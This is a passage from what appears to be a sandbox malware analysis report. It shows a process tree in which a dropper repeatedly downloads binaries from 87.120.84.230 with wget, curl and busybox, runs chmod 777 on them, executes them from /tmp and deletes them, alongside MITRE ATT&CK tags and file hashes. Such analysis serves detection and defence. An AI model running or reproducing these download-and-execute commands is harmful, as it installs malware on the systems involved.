/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:1631
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:1634
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:1637
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:1640
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:1641
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:1643
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1645
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:1646
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:1649
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:1652
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:1655
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:1658
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1659
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1661
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1664
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97